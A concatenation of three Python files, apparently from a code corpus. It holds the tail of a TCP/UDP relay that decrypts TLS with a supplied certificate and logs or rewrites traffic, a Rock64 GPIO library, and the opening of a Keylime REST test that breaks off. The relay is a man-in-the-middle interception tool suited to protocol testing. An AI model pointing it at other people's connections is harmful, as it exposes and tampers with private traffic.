t.setDaemon(True)
t.start()
time.sleep(.2)
while True:
try:
time.sleep(100)
except KeyboardInterrupt:
sys.exit("\rExiting...")
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
content_length = int(self.headers.get('content-length'))
body = self.rfile.read(content_length)
self.send_response(200)
self.end_headers()
self.wfile.write(body)
return
def log_message(self, format, *args):
return
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
def start_ws():
print('[+] Webserver listening on', BIND_WEBSERVER)
server = HTTPServer(BIND_WEBSERVER, RequestHandler)
try:
t = Thread(target=server.serve_forever)
t.daemon = True
t.start()
except KeyboardInterrupt:
server.shutdown()
def color(txt, mod=1, fg=32, bg=49):
return "\033[%s;%d;%dm%s\033[0m" % (mod, fg, bg, txt) if 'win' not in sys.platform else txt
def data_repr(data):
def hexdump(src, length=16):
result = []
digits = 2
s = src[:]
for i in range(0, len(s), length):
hexa = " ".join(["%0*X" % (digits, x) for x in src[i:i+length]])
text = "".join([chr(x) if 0x20 <= x < 0x7F else "." for x in s[i:i+length]])
result.append("%08x: %-*s |%s|\n" % (i, length * (digits + 1), hexa, text))
return "".join(result)
try:
data = data.decode("ascii")
return '\n'+data
except:
return '\n'+hexdump(data)
# STARTTLS interception code based on:
# https://github.com/ipopov/starttls-mitm
def do_relay_tcp(client_sock, server_sock, cfg):
server_sock.settimeout(cfg.server_timeout)
client_sock.settimeout(cfg.client_timeout)
server_peer = server_sock.getpeername()
client_peer = client_sock.getpeername()
# ssl.PROTOCOL_TLS is available only since 2.7.13
try:
cfg_ssl_version = ssl.PROTOCOL_TLS
except:
cfg_ssl_version = ssl.PROTOCOL_SSLv23
if cfg.tlsver:
if cfg.tlsver == "tls1":
cfg_ssl_version = ssl.PROTOCOL_TLSv1
elif cfg.tlsver == "tls11":
cfg_ssl_version = ssl.PROTOCOL_TLSv1_1
elif cfg.tlsver == "tls12":
cfg_ssl_version = ssl.PROTOCOL_TLSv1_2
elif cfg.tlsver in ["ssl2", "ssl3"]:
cfg_ssl_version = ssl.PROTOCOL_SSLv23
while True:
# Peek for the beginnings of an ssl handshake
try:
packet = client_sock.recv(BUFSIZE, socket.MSG_PEEK | socket.MSG_DONTWAIT)
if packet.startswith(b'\x16\x03'): # SSL/TLS Handshake.
if not (cfg.cert and cfg.key):
print(color("[!] SSL/TLS handshake detected, provide a server cert and key to enable interception.", 1, 31))
else:
print(color('---------------------- Wrapping sockets ----------------------', 1, 32))
client_sock = ssl.wrap_socket(client_sock, server_side=True, suppress_ragged_eofs=True, certfile=cfg.cert.name, keyfile=cfg.key.name, ssl_version=cfg_ssl_version)
# Use client-side cert/key if provided.
if (cfg.clientcert and cfg.clientkey):
server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True, certfile=cfg.clientcert.name, keyfile=cfg.clientkey.name, ssl_version=cfg_ssl_version)
else:
server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True, ssl_version=cfg_ssl_version)
except:
pass
receiving, _, _ = select([client_sock, server_sock], [], [])
try:
if client_sock in receiving:
data_out = client_sock.recv(BUFSIZE)
if not len(data_out): # client closed connection
print("[+] Client disconnected", client_peer)
client_sock.close()
server_sock.close()
break
data_out = proxify(data_out, cfg, client_peer, server_peer, to_server=True)
server_sock.send(data_out)
if server_sock in receiving:
data_in = server_sock.recv(BUFSIZE)
if not len(data_in): # server closed connection
print("[+] Server disconnected", server_peer)
client_sock.close()
server_sock.close()
break
data_in = proxify(data_in, cfg, client_peer, server_peer, to_server=False)
client_sock.send(data_in)
except socket.error as e:
print(color("[!] %s" % str(e), 1, 31))
def do_relay_udp(relay_sock, server, cfg):
client = None
while True:
receiving, _, _ = select([relay_sock], [], [])
if relay_sock in receiving:
data, addr = relay_sock.recvfrom(BUFSIZE)
if addr == server:
data = proxify(data, cfg, client, server, to_server=False)
relay_sock.sendto(data, client)
else:
client = addr
data = proxify(data, cfg, client, server, to_server=True)
relay_sock.sendto(data, server)
def proxify(message, cfg, client_peer, server_peer, to_server=True):
def get_response():
try:
return requests.post('http://%s:%d/%s/%s/%d' %
(BIND_WEBSERVER[0], BIND_WEBSERVER[1],
('CLIENT_REQUEST/to' if to_server else 'SERVER_RESPONSE/from'),
server_peer[0], server_peer[1]),
proxies={'http': cfg.proxy},
headers=headers,
data=message).content
except requests.exceptions.ProxyError:
print(color("[!] error: can't connect to proxy!", 1, 31))
return message
"""
Modify traffic here
Send to our own parser functions, to the proxy, or both.
"""
server_str = color('%s:%d' % server_peer, 1, 34)
client_str = color('%s:%d' % client_peer, 1, 36)
date_str = color(time.strftime("%a %d %b %H:%M:%S", time.gmtime()), 1, 35)
modified_str = color('(modified!)', 1, 32)
modified = False
if cfg.script:
new_message = message
if to_server and hasattr(cfg.script_module, 'handle_request'):
new_message = cfg.script_module.handle_request(message)
if not to_server and hasattr(cfg.script_module, 'handle_response'):
new_message = cfg.script_module.handle_response(message)
if new_message == None:
print(color("[!] Error: make sure handle_request and handle_response both return a message.", 1, 31))
new_message = message
if new_message != message:
modified = True
message = new_message
if cfg.proxy:
headers = {u'User-Agent': None, u'Accept': None, u'Accept-Encoding': None, u'Connection': None}
headers['X-Mitm_Relay-To'] = '%s:%d' % (server_peer if to_server else client_peer)
headers['X-Mitm_Relay-From'] = '%s:%d' % (client_peer if to_server else server_peer)
new_message = get_response()
if new_message != message:
modified = True
message = new_message
if to_server:
msg_str = color(data_repr(message), 0, 93)
print("C >> S [ %s >> %s ] [ %s ] [ %d ] %s %s" % (client_str, server_str, date_str, len(message), modified_str if modified else '', msg_str))
else:
msg_str = color(data_repr(message), 0, 33)
print("S >> C [ %s >> %s ] [ %s ] [ %d ] %s %s" % (server_str, client_str, date_str, len(message), modified_str if modified else '', msg_str))
return message
def handle_tcp_client(client_sock, target, cfg):
try:
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect(target)
do_relay_tcp(client_sock, server_sock, cfg)
except ConnectionRefusedError as e:
print(color('[!] Unable to connect to server: %s' % str(e), 1, 31))
def create_server(relay, cfg):
proto, lport, rhost, rport = relay
if proto == 'tcp':
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((cfg.listen, lport))
serv.listen(2)
print('[+] Relay listening on %s %d -> %s:%d' % relay)
while True:
if proto == 'tcp':
client, addr = serv.accept()
dest_str = '%s:%d' % (relay[2], relay[3])
print(color('[+] New client %s:%d will be relayed to %s' % (addr[0], addr[1], dest_str), 1, 39))
thread = Thread(target=handle_tcp_client, args=(client, (rhost, rport), cfg))
thread.start()
else:
serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((cfg.listen, lport))
thread = Thread(target=do_relay_udp, args=(serv, (rhost, rport), cfg))
thread.start()
if __name__=='__main__':
main()
|
_GPIO.py
|
#!/usr/bin/env python
# Allison Creely, 2018, LGPLv3 License
# Rock 64 GPIO Library for Python
# Import modules
import os.path
from multiprocessing import Process, Value
from time import time
from time import sleep
# Define static module variables
var_gpio_root = '/sys/class/gpio'
ROCK = 'ROCK'
BOARD = 'BOARD'
BCM = 'BCM'
HIGH = 1
LOW = 0
OUT = 'out'
IN = 'in'
RISING = 'rising'
FALLING = 'falling'
BOTH = 'both'
PUD_UP = 0
PUD_DOWN = 1
VERSION = '0.6.3'
RPI_INFO = {'P1_REVISION': 3, 'RAM': '1024M', 'REVISION': 'a22082', 'TYPE': 'Pi 3 Model B', 'PROCESSOR': 'BCM2837', 'MANUFACTURER': 'Embest'}
# Define GPIO arrays
ROCK_valid_channels = [27, 32, 33, 34, 35, 36, 37, 38, 60, 64, 65, 67, 68, 69, 76, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 96, 97, 98, 100, 101, 102, 103, 104]
BOARD_to_ROCK = [0, 0, 0, 89, 0, 88, 0, 60, 64, 0, 65, 0, 67, 0, 0, 100, 101, 0, 102, 97, 0, 98, 103, 96, 104, 0, 76, 68, 69, 0, 0, 0, 38, 32, 0, 33, 37, 34, 36, 0, 35, 0, 0, 81, 82, 87, 83, 0, 0, 80, 79, 85, 84, 27, 86, 0, 0, 0, 0, 0, 0, 89, 88]
BCM_to_ROCK = [68, 69, 89, 88, 81, 87, 83, 76, 104, 98, 97, 96, 38, 32, 64, 65, 37, 80, 67, 33, 36, 35, 100, 101, 102, 103, 34, 82]
# Define dynamic module variables
gpio_mode = None
warningmode = 1
# GPIO Functions
def setmode(mode):
if mode in ['ROCK','BOARD','BCM']:
global gpio_mode
gpio_mode = mode
else:
print("An invalid mode ({}) was passed to setmode(). Use one of the following: ROCK, BOARD, BCM".format(mode))
def getmode():
if gpio_mode in ['ROCK','BOARD','BCM']:
return gpio_mode
else:
print("Error: An invalid mode ({}) is currently set".format(gpio_mode))
def get_gpio_number(channel):
if gpio_mode in ['ROCK','BOARD','BCM']:
# Convert to ROCK GPIO
if gpio_mode == BOARD:
channel_new = BOARD_to_ROCK[channel]
if gpio_mode == BCM:
channel_new = BCM_to_ROCK[channel]
if gpio_mode == ROCK:
channel_new = channel
# Check that the GPIO is valid
if channel_new in ROCK_valid_channels:
return channel_new
else:
print("Error: GPIO not supported on {0} {1}".format(gpio_mode, channel))
return None
else:
print("RuntimeError: Please set pin numbering mode using GPIO.setmode(GPIO.ROCK), GPIO.setmode(GPIO.BOARD), or GPIO.setmode(GPIO.BCM)")
return None
def gpio_function(channel):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
if channel_int == None:
return
# Get direction of requested GPIO
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/direction"
with open(var_gpio_filepath, 'r') as file:
direction = file.read(1)
except:
return "GPIO.UNKNOWN"
if direction == 'i':
return "GPIO.INPUT"
elif direction == 'o':
return "GPIO.OUTPUT"
else:
return "GPIO.UNKNOWN"
def setwarnings(state=True):
if state in [0,1]:
global warningmode
warningmode = state
else:
print("Error: {} is not a valid warning mode. Use one of the following: True, 1, False, 0".format(state))
def validate_direction(channel, validation_type='both'):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
if channel_int == None:
return
# Get direction of requested GPIO
if validation_type in ['input', 'output', 'both']:
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/direction"
with open(var_gpio_filepath, 'r') as file:
direction = file.read(1)
except:
direction = 'none'
# Perform sanity checks
if (validation_type == 'input') and (direction != 'i'):
print("You must setup() the GPIO channel ({0} {1}) as an input first".format(gpio_mode, channel))
return 0
elif (validation_type == 'output') and (direction != 'o'):
print("You must setup() the GPIO channel ({0} {1}) as an output first".format(gpio_mode, channel))
return 0
elif ((validation_type == 'both') and (direction not in ['i', 'o'])) or (direction == 'none'):
print("You must setup() the GPIO channel ({0} {1}) first".format(gpio_mode, channel))
return 0
else:
return 1
else:
print("Error: {} is not a valid direction. use one of the following: input, output, both")
return
def setup(channel, direction, pull_up_down=PUD_DOWN, initial=LOW):
# If channel is an intiger, convert intiger to list
if isinstance(channel, int) == True:
channel = [channel]
# Itterate through channel list
for index in range(len(channel)):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel[index])
if channel_int == None:
return
# Check if GPIO export already exists
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
var_gpio_exists = os.path.exists(var_gpio_filepath)
if var_gpio_exists == 1:
if warningmode == 1:
print("This channel ({0} {1}) is already in use, continuing anyway. Use GPIO.setwarnings(False) to disable warnings.".format(gpio_mode, channel[index]))
# Export GPIO if an export doesn't already exist
else:
try:
var_gpio_filepath = var_gpio_root + "/export"
with open(var_gpio_filepath, 'w') as file:
file.write(str(channel_int))
except:
print("Error: Unable to export GPIO")
# Set GPIO direction (in/out)
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/direction"
with open(var_gpio_filepath, 'w') as file:
file.write(str(direction))
except:
print("Error: Unable to set GPIO direction")
return
# If GPIO direction is out, set initial value of the GPIO (high/low)
if direction == 'out':
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'w') as file:
# If multiple initial values, itterate through initial values
if isinstance(initial, int) == False:
file.write(str(initial[index]))
else:
file.write(str(initial))
except:
print("Error: Unable to set GPIO initial state")
# If GPIO direction is in, set the state of internal pullup (high/low)
if direction == 'in':
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/active_low"
with open(var_gpio_filepath, 'w') as file:
file.write(str(pull_up_down))
except:
print("Error: Unable to set internal pullup resistor state")
def output(channel, value):
# If channel is an intiger, convert intiger to list
if isinstance(channel, int) == True:
channel = [channel]
# Itterate through channel list
for index in range(len(channel)):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel[index])
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel[index], 'output') == 0:
return
# Set the value of the GPIO (high/low)
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'w') as file:
# If multiple states, itterate through states
if isinstance(value, int) == False:
file.write(str(value[index]))
else:
file.write(str(value))
except:
print("Error: Unable to set GPIO output state")
def input(channel):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel, 'both') == 0:
return
# Get the value of the GPIO
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'r') as file:
return int(file.read(1))
except:
print("Error: Unable to get GPIO value")
def wait_for_edge(channel, edge, bouncetime='none', timeout='none'):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel, 'input') == 0:
return
if edge not in [RISING, FALLING, BOTH]:
print("The edge must be set to GPIO.RISING, GPIO.FALLING or GPIO.BOTH")
return
if (bouncetime != 'none') and (bouncetime <= 0):
print("Bouncetime must be greater than 0")
return
if (timeout != 'none') and (timeout <= 0):
print("timeout must be greater than 0")
return
# Set the edge state to trigger on
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/edge"
with open(var_gpio_filepath, 'w') as file:
file.write(str(edge))
except:
print("Error: Unable to set GPIO edge state")
return
# Get current state of the input
try:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'r') as file:
original_value = file.read(1)
except:
print("Error: Unable to get GPIO value")
return
# convert times from ms to fractions of a second
if timeout != 'none':
timeout = timeout / 1000.0
if bouncetime != 'none':
bouncetime = bouncetime / 1000.0
# Wait for interrupt (10ms resolution)
while True:
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
with open(var_gpio_filepath, 'r') as file:
new_value = file.read(1)
if new_value != original_value:
if bouncetime != 'none':
sleep(bouncetime)
return True
sleep(0.01)
if timeout != 'none':
timeout -= 0.01
if timeout <= 0.0:
return None
def event_detected(channel):
print("Error: GPIO.event_detected() Not implemented")
def add_event_detect(gpio, edge, callback='none', bouncetime='none'):
print("Error: GPIO.add_event_detect() Not implemented")
#p = Process(target=wait_for_edge, args=(gpio, edge), name='eventdetect_process')
#p.start()
def add_event_callback(gpio, callback):
print("Error: GPIO.add_event_callback() Not implemented")
def remove_event_detect(gpio):
print("Error: GPIO.remove_event_detect() Not implemented")
def cleanup(channel='none'):
# If no channel is specified...
if channel == 'none':
# Cleanup all GPIOs
var_gpio_cleared = 0
for gpio_index in range(105):
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(gpio_index) + "/value"
var_gpio_exists = os.path.exists(var_gpio_filepath)
if var_gpio_exists == 1:
try:
var_gpio_filepath = var_gpio_root + "/unexport"
with open(var_gpio_filepath, 'w') as file:
file.write(str(gpio_index))
var_gpio_cleared = 1
except:
print("Error: Unknown failure while performing cleanup")
if (var_gpio_cleared == 0) and (warningmode == 1):
print("No channels have been set up yet - nothing to clean up! Try cleaning up at the end of your program instead!")
# If a channel is specified...
else:
# If channel is an intiger, convert intiger to list
if isinstance(channel, int) == True:
channel = [channel]
# Itterate through channel list
for index in range(len(channel)):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel[index])
if channel_int == None:
return
# Cleanup specified GPIO
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
var_gpio_exists = os.path.exists(var_gpio_filepath)
if var_gpio_exists == 1:
try:
var_gpio_filepath = var_gpio_root + "/unexport"
with open(var_gpio_filepath, 'w') as file:
file.write(str(channel_int))
except:
print("Error: Unknown failure while performing cleanup")
# PWM Class
class PWM:
def __init__(self, channel, frequency):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel, 'output') == 0:
return
if frequency <= 0.0:
print("frequency must be greater than 0.0")
return
self.freq = frequency
self.gpio = channel_int
self.state = 0
return
def start(self, dutycycle, pwm_precision=HIGH):
if (dutycycle < 0.0) or (dutycycle > 100.0):
print("dutycycle must have a value from 0.0 to 100.0")
return
self.precision = pwm_precision
self.dutycycle = dutycycle
self.pwm_calc()
self.p = Process(target=self.pwm_process, args=(self.gpio, self.sleep_high, self.sleep_low, self.precision), name='pwm_process')
self.p.start()
self.state = 1
def stop(self):
self.p.terminate()
self.p.join()
self.state = 0
@staticmethod
def pwm_busywait(wait_time):
current_time = time()
while (time() < current_time+wait_time):
pass
def pwm_calc(self):
self.sleep_low = (1.0 / self.freq) * ((100 - self.dutycycle) / 100.0)
self.sleep_high = (1.0 / self.freq) * ((100 - (100 - self.dutycycle)) / 100.0)
@staticmethod
def pwm_process(channel, sleep_high, sleep_low, precision=HIGH):
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel) + "/value"
# Note: Low precision mode greatly reduces CPU usage, but accuracy will depend upon your kernel.
# p.start(dutycycle, pwm_precision=GPIO.LOW)
try:
if precision == HIGH:
while True:
with open(var_gpio_filepath, 'w') as file:
file.write('1')
PWM.pwm_busywait(sleep_high)
with open(var_gpio_filepath, 'w') as file:
file.write('0')
PWM.pwm_busywait(sleep_low)
else:
while True:
with open(var_gpio_filepath, 'w') as file:
file.write('1')
sleep(sleep_high)
with open(var_gpio_filepath, 'w') as file:
file.write('0')
sleep(sleep_low)
except:
try:
with open(var_gpio_filepath, 'w') as file:
file.write('0')
except:
pass
print("Warning: PWM process ended prematurely")
def ChangeFrequency(self, frequency):
self.freq = frequency
if self.state == 1:
self.stop()
self.start(self.dutycycle)
def ChangeDutyCycle(self, dutycycle):
self.dutycycle = dutycycle
if self.state == 1:
self.stop()
self.start(self.dutycycle)
|
test_restful.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
NOTE:
This unittest is being used as a procedural test.
The tests must be run in-order and CANNOT be parallelized!
Tests all but two RESTful interfaces:
* agent's POST /v2/keys/vkey
- Done by CV after the CV's POST /v2/agents/{UUID} command is performed
* CV's PUT /v2/agents/{UUID}
- POST already bootstraps agent, so PUT is redundant in this test
The registrar's PUT vactivate interface is only tested if a vTPM is present!
USAGE:
Should be run in test directory under root privileges with either command:
* python -m unittest -v test_restful
* green -vv
(with `pip install green`)
To run without root privileges, be sure to export KEYLIME_TEST=True
For Python Coverage support (pip install coverage), set env COVERAGE_FILE and:
* coverage run --parallel-mode test_restful.py
'''
import sys
import signal
import unittest
import subprocess
import time
import os
import base64
import threading
import shutil
import errno
from pathlib import Path
import dbus
import simplejson as json
from keylime import config
from keylime import tornado_requests
from keylime.requests_client import RequestsClient
from keylime import tenant
from keylime import crypto
from keylime.cmd import user_data_encrypt
from keylime import secure_mount
from keylime.tpm import tpm_main
from keylime.tpm import tpm_abstract
# Coverage support
if "COVERAGE_FILE" in os.environ:
FORK_ARGS = ["coverage", "run", "--parallel-mode"]
if "COVERAGE_DIR" in os.environ:
FORK_ARGS += ["--rcfile=" + os.environ["COVERAGE_DIR"] + "/.coveragerc"]
else:
FORK_ARGS = ["python3"]
# Custom imports
PACKAGE_ROOT = Path(__file__).parents[1]
KEYLIME_DIR = (f"{PACKAGE_ROOT}/keylime")
sys.path.append(KEYLIME_DIR)
# Custom imports
# PACKAGE_ROOT = Path(__file__).parents[1]
# CODE_ROOT = (f"{PACKAGE_ROOT}/keylime/")
# sys.path.insert(0, CODE_ROOT)
# Will be used to communicate with the TPM
tpm_instance = None
# cmp depreciated in Python 3, so lets recreate it.
def cmp(a, b):
return (a > b) - (a < b)
# Ensure this is run as root
if os.geteuid() != 0 and config.REQUIRE_ROOT:
sys.exit("Tests need to be run with root privileges, or set env KEYLIME_TEST=True!")
# Force sorting tests alphabetically
unittest.TestLoader.sortTestMethodsUsing = lambda _, x, y: cmp(x, y)
# Environment to pass to services
script_env = os.environ.copy()
# Globals to keep track of Keylime components
cv_process = None
reg_process = None
agent_process = None
tenant_templ = None
# Class-level components that are not static (so can't be added to test class)
public_key = None
keyblob = None
ek_tpm = None
aik_tpm = None
vtpm = False
# Set up mTLS
my_cert = config.get('tenant', 'my_cert')
my_priv_key = config.get('tenant', 'private_key')
cert = (my_cert, my_priv_key)
tls_enabled = True
# Like os.remove, but ignore file DNE exceptions
def fileRemove(path):
try:
os.remove(path)
except OSError as e:
# Ignore if file does not exist
if e.errno != errno.ENOENT:
raise
# Boring setup stuff
def setUpModule():
try:
env = os.environ.copy()
env['PATH'] = env['PATH'] + ":/usr/local/bin"
# Run init_tpm_server and tpm_serverd (start fresh)
its = subprocess.Popen(["init_tpm_server"], shell=False, env=env)
its.wait()
tsd = subprocess.Popen(["tpm_serverd"], shell=False, env=env)
tsd.wait()
except Exception as e:
print("WARNING: Restarting TPM emulator failed!")
# Note: the following is required as abrmd is failing to reconnect to MSSIM, once
# MSSIM is killed and restarted. If this is an proved an actual bug and is
# fixed upstream, the following dbus restart call can be removed.
try:
sysbus = dbus.SystemBus()
systemd1 = sysbus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(systemd1, 'org.freedesktop.systemd1.Manager')
# If the systemd service exists, let's restart it.
for service in sysbus.list_names():
if "com.intel.tss2.Tabrmd" in service:
print("Found dbus service:", str(service))
try:
print("Restarting tpm2-abrmd.service.")
manager.RestartUnit('tpm2-abrmd.service', 'fail')
except dbus.exceptions.DBusException as e:
print(e)
except Exception as e:
print("Non systemd agent detected, no tpm2-abrmd restart required.")
try:
# Start with a clean slate for this test
fileRemove(config.WORK_DIR + "/tpmdata.yaml")
fileRemove(config.WORK_DIR + "/cv_data.sqlite")
fileRemove(config.WORK_DIR + "/reg_data.sqlite")
shutil.rmtree(config.WORK_DIR + "/cv_ca", True)
except Exception as e:
print("WARNING: Cleanup of TPM files failed!")
# CV must be run first to create CA and certs!
launch_cloudverifier()
launch_registrar()
# launch_cloudagent()
# Make the Tenant do a lot of set-up work for us
global tenant_templ
tenant_templ = tenant.Tenant()
tenant_templ.agent_uuid = config.get('cloud_agent', 'agent_uuid')
tenant_templ.cloudagent_ip = "localhost"
tenant_templ.cloudagent_port = config.get('cloud_agent', 'cloudagent_port')
tenant_templ.verifier_ip = config.get('cloud_verifier', 'cloudverifier_ip')
tenant_templ.verifier_port = config.get('cloud_verifier', 'cloudverifier_port')
tenant_templ.registrar_ip = config.get('registrar', 'registrar_ip')
tenant_templ.registrar_boot_port = config.get('registrar', 'registrar_port')
tenant_templ.registrar_tls_boot_port = config.get('registrar', 'registrar_tls_port')
tenant_templ.registrar_base_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_boot_port}'
tenant_templ.registrar_base_tls_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_tls_boot_port}'
tenant_templ.agent_base_url = f'{tenant_templ.cloudagent_ip}:{tenant_templ.cloudagent_port}'
# Set up TLS
my_tls_cert, my_tls_priv_key = tenant_templ.get_tls_context()
tenant_templ.cert = (my_tls_cert, my_tls_priv_key)
# Destroy everything on teardown
def tearDownModule():
# Tear down in reverse order of dependencies
kill_cloudagent()
kill_cloudverifier()
kill_registrar()
def launch_cloudverifier():
"""Start up the cloud verifier"""
global cv_process, script_env, FORK_ARGS
if cv_process is None:
cv_process = subprocess.Popen("keylime_verifier",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[96m' + "\nCloud Verifier Thread" + '\033[0m')
while True:
line = cv_process.stdout.readline()
if line == b'':
break
line = line.decode('utf-8')
line = line.rstrip(os.linesep)
sys.stdout.flush()
sys.stdout.write('\n\033[96m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(30)
return True
def launch_registrar():
"""Start up the registrar"""
global reg_process, script_env, FORK_ARGS
if reg_process is None:
reg_process = subprocess.Popen("keylime_registrar",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[95m' + "\nRegistrar Thread" + '\033[0m')
while True:
line = reg_process.stdout.readline()
if line == b"":
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[95m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def launch_cloudagent():
"""Start up the cloud agent"""
global agent_process, script_env, FORK_ARGS
if agent_process is None:
agent_process = subprocess.Popen("keylime_agent",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[94m' + "\nCloud Agent Thread" + '\033[0m')
while True:
line = agent_process.stdout.readline()
if line == b'':
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[94m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def kill_cloudverifier():
"""Kill the cloud verifier"""
global cv_process
if cv_process is None:
return
os.killpg(os.getpgid(cv_process.pid), signal.SIGINT)
cv_process.wait()
cv_process = None
def kill_registrar():
"""Kill the registrar"""
global reg_process
if reg_process is None:
return
os.killpg(os.getpgid(reg_process.pid), signal.SIGINT)
reg_process.wait()
reg_process = None
def kill_cloudagent():
"""Kill the cloud agent"""
global agent_process
if agent_process is None:
return
os.killpg(os.getpgid(agent_process.pid), signal.SIGINT)
agent_process.wait()
agent_process = None
def services_running():
if reg_process.poll() is None and cv_process.poll() is None:
return True
return False
class TestRestful(unittest.TestCase):
# Static class members (won't change between tests)
payload = None
auth_tag = None
tpm_policy = {}
vtpm_policy = {}
metadata = {}
allowlist = {}
revocation_key = ""
mb_refstate = None
K = None
U = None
V = None
api_version = config.API_VERSION
cloudagent_ip = None
cloudagent_port = None
@classmethod
def setUpClass(cls):
"""Prepare the keys and payload to give to the CV"""
contents = "random garbage to test as payload"
# contents = contents.encode('utf-8')
ret = user_data_encrypt.encrypt(contents)
cls.K = ret['k']
cls.U = ret['u']
cls.V = ret['v']
cls.payload = ret['ciphertext']
# Set up to register an agent
cls.auth_tag = crypto.do_hmac(cls.K, tenant_templ.agent_uuid)
# Prepare policies for agent
cls.tpm_policy = config.get('tenant', 'tpm_policy')
cls.vtpm_policy = config.get('tenant', 'vtpm_policy')
cls.tpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.tpm_policy)
cls.vtpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.vtpm_policy)
# Allow targeting a specific API version (default latest)
cls.api_version = config.API_VERSION
def setUp(self):
"""Nothing to set up before each test"""
return
def test_000_services(self):
"""Ensure everyone is running before doing tests"""
self.assertTrue(services_running(), "Not all services started successfully!")
# Registrar Testset
def test_010_reg_agent_post(self):
"""Test registrar's POST /v2/agents/{UUID} Interface"""
global keyblob, vtpm, tpm_instance, ek_tpm, aik_tpm
contact_ip = "127.0.0.1"
contact_port = 9002
tpm_instance = tpm_main.tpm()
# Change CWD for TPM-related operations
cwd = os.getcwd()
config.ch_dir(config.WORK_DIR, None)
_ = secure_mount.mount()
# Initialize the TPM with AIK
(ekcert, ek_tpm, aik_tpm) = tpm_instance.tpm_init(self_activate=False,
config_pw=config.get('cloud_agent', 'tpm_ownerpassword'))
vtpm = tpm_instance.is_vtpm()
# Handle virtualized and emulated TPMs
if ekcert is None:
if vtpm:
ekcert = 'virtual'
elif tpm_instance.is_emulator():
ekcert = 'emulator'
# Get back to our original CWD
config.ch_dir(cwd, None)
data = {
'ekcert': ekcert,
'aik_tpm': aik_tpm,
'ip': contact_ip,
'port': contact_port
}
if ekcert is None or ekcert == 'emulator':
data['ek_tpm'] = ek_tpm
test_010_reg_agent_post = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_010_reg_agent_post.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Add return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("blob", json_response["results"], "Malformed response body!")
keyblob = json_response["results"]["blob"]
self.assertIsNotNone(keyblob, "Malformed response body!")
@unittest.skipIf(vtpm, "Registrar's PUT /v2/agents/{UUID}/activate only for non-vTPMs!")
def test_011_reg_agent_activate_put(self):
"""Test registrar's PUT /v2/agents/{UUID}/activate Interface"""
global keyblob
self.assertIsNotNone(keyblob, "Required value not set. Previous step may have failed?")
key = tpm_instance.activate_identity(keyblob)
data = {
